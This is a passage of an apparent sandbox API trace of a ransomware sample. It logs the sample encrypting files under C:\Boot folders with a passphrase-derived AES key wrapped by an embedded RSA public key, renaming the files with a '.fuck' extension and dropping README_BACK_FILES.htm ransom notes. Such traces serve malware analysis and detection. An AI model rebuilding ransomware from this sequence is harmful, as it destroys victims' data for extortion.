pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.560] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.560] CloseHandle (hObject=0xffffffff) returned 1 [0140.560] CloseHandle (hObject=0x5d54) returned 1 [0140.561] CopyFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.566] SetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.566] DeleteFileA (lpFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.gsg")) returned 1 [0140.567] MoveFileA (lpExistingFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\sv-SE\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.fuck")) returned 0 [0140.567] CryptDestroyHash (hHash=0x27ff358) returned 1 [0140.567] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.567] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.567] FindNextFileA (in: hFindFile=0x27ff218, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.568] FindClose (in: hFindFile=0x27ff218 | out: hFindFile=0x27ff218) returned 1 [0140.568] GetFileAttributesA (lpFileName="C:\\\\Boot\\sv-SE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sv-se\\readme_back_files.htm")) returned 0xffffffff [0140.568] AreFileApisANSI () returned 1 [0140.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d1d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.568] CreateFileW (lpFileName="C:\\\\Boot\\sv-SE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\sv-se\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.570] GetFileType (hFile=0x5d50) returned 0x1 [0140.570] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.571] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.571] FindFirstFileA (in: lpFileName="C:\\\\Boot\\tr-TR\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff358 [0140.571] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.571] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.571] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.571] GetLastError () returned 0x0 [0140.571] GetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui")) returned 0x20 [0140.571] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.572] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.572] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.572] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.573] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.575] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.575] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.575] CryptHashData (hHash=0x27ff4d8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.575] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.575] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.575] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.575] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x28050f8) returned 1 [0140.576] CryptImportPublicKeyInfo (in: hCryptProv=0x28050f8, dwCertEncodingType=0x1, pInfo=0x28014f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2801520*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2801528*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fee98) returned 1 [0140.576] CryptEncrypt (in: hKey=0x27fee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.576] CryptEncrypt (in: hKey=0x27fee98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2805208*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2805208*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.576] WriteFile (in: hFile=0x5d54, lpBuffer=0x2805208*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2805208*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.577] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.577] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.577] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.577] CloseHandle (hObject=0xffffffff) returned 1 [0140.577] CloseHandle (hObject=0x5d54) returned 1 [0140.579] CopyFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.597] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.597] DeleteFileA (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.gsg")) returned 1 [0140.598] MoveFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.fuck")) returned 0 [0140.599] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0140.599] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.599] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.599] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.599] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.599] GetLastError () returned 0x5 [0140.599] GetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui")) returned 0x20 [0140.600] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0140.600] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.600] CreateFileA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.600] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.601] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.602] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.602] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.602] CryptHashData (hHash=0x27ff4d8, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.602] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff4d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff5d8) returned 1 [0140.602] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.602] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.603] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x2805290) returned 1 [0140.603] CryptImportPublicKeyInfo (in: hCryptProv=0x2805290, dwCertEncodingType=0x1, pInfo=0x2801350*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2801380*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2801388*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27febd8) returned 1 [0140.603] CryptEncrypt (in: hKey=0x27febd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.603] CryptEncrypt (in: hKey=0x27febd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2805318*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x2805318*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.603] WriteFile (in: hFile=0x5d54, lpBuffer=0x2805318*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2805318*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.604] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.604] CryptEncrypt (in: hKey=0x27ff5d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.604] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.604] CloseHandle (hObject=0xffffffff) returned 1 [0140.604] CloseHandle (hObject=0x5d54) returned 1 [0140.605] CopyFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0140.609] SetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0140.609] DeleteFileA (lpFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.gsg")) returned 1 [0140.610] MoveFileA (lpExistingFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\tr-TR\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\tr-tr\\memtest.exe.mui.fuck")) returned 0 [0140.611] CryptDestroyHash (hHash=0x27ff4d8) returned 1 [0140.611] CryptDestroyKey (hKey=0x27ff5d8) returned 1 [0140.611] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.611] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.611] FindClose (in: hFindFile=0x27ff358 | out: hFindFile=0x27ff358) returned 1 [0140.611] GetFileAttributesA (lpFileName="C:\\\\Boot\\tr-TR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\tr-tr\\readme_back_files.htm")) returned 0xffffffff [0140.611] AreFileApisANSI () returned 1 [0140.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d750, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.611] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\README_BACK_FILES.htm" (normalized: "c:\\boot\\tr-tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.613] GetFileType (hFile=0x5d50) returned 0x1 [0140.613] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.614] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.614] FindFirstFileA (in: lpFileName="C:\\\\Boot\\uk-UA\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff4d8 [0140.614] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.614] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.614] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.614] GetLastError () returned 0x0 [0140.614] GetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui")) returned 0x20 [0140.614] SetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.615] CreateFileA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0140.615] CreateFileA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0140.616] SetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0140.616] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x2803998) returned 1 [0140.618] CryptCreateHash (in: hProv=0x2803998, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0140.618] lstrlenA (lpString="wXOntOzByKCSzZplJZPPJFJezMlQm") returned 29 [0140.618] CryptHashData (hHash=0x27ff5d8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0140.618] CryptDeriveKey (in: hProv=0x2803998, Algid=0x6610, hBaseData=0x27ff5d8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x27ff218) returned 1 [0140.618] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0140.618] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0140.618] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x28053a0) returned 1 [0140.619] CryptImportPublicKeyInfo (in: hCryptProv=0x28053a0, dwCertEncodingType=0x1, pInfo=0x2801420*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2801450*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2801458*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x27fe858) returned 1 [0140.619] CryptEncrypt (in: hKey=0x27fe858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0140.619] CryptEncrypt (in: hKey=0x27fe858, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27edd40*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27edd40*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0140.620] WriteFile (in: hFile=0x5d54, lpBuffer=0x27edd40*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27edd40*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0140.621] ReadFile (in: hFile=0xffffffff, lpBuffer=0x5c67c8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0140.621] CryptEncrypt (in: hKey=0x27ff218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x5c67c8*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0140.621] WriteFile (in: hFile=0x5d54, lpBuffer=0x5c67c8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x5c67c8*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0140.621] CloseHandle (hObject=0xffffffff) returned 1 [0140.621] CloseHandle (hObject=0x5d54) returned 1 [0140.621] CopyFileA (lpExistingFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0140.625] SetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0140.625] DeleteFileA (lpFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.gsg")) returned 1 [0140.642] MoveFileA (lpExistingFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\uk-UA\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\uk-ua\\bootmgr.exe.mui.fuck")) returned 0 [0140.643] CryptDestroyHash (hHash=0x27ff5d8) returned 1 [0140.643] CryptDestroyKey (hKey=0x27ff218) returned 1 [0140.643] CryptReleaseContext (hProv=0x2803998, dwFlags=0x0) returned 1 [0140.643] FindNextFileA (in: hFindFile=0x27ff4d8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0140.643] FindClose (in: hFindFile=0x27ff4d8 | out: hFindFile=0x27ff4d8) returned 1 [0140.643] GetFileAttributesA (lpFileName="C:\\\\Boot\\uk-UA\\README_BACK_FILES.htm" (normalized: "c:\\boot\\uk-ua\\readme_back_files.htm")) returned 0xffffffff [0140.643] AreFileApisANSI () returned 1 [0140.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d2b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0140.643] CreateFileW (lpFileName="C:\\\\Boot\\uk-UA\\README_BACK_FILES.htm" (normalized: "c:\\boot\\uk-ua\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0140.644] GetFileType (hFile=0x5d50) returned 0x1 [0140.644] WriteFile (in: hFile=0x5d50, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0140.644] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0140.645] FindFirstFileA (in: lpFileName="C:\\\\Boot\\zh-CN\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x27ff358 [0140.645] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.645] FindNextFileA (in: hFindFile=0x27ff358, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0140.645] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0140.645] GetLastError () returned 0x0 [0140.645] GetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui")) returned 0x20 [0140.646] SetFileAttributesA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0140.646] CreateFileA (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), 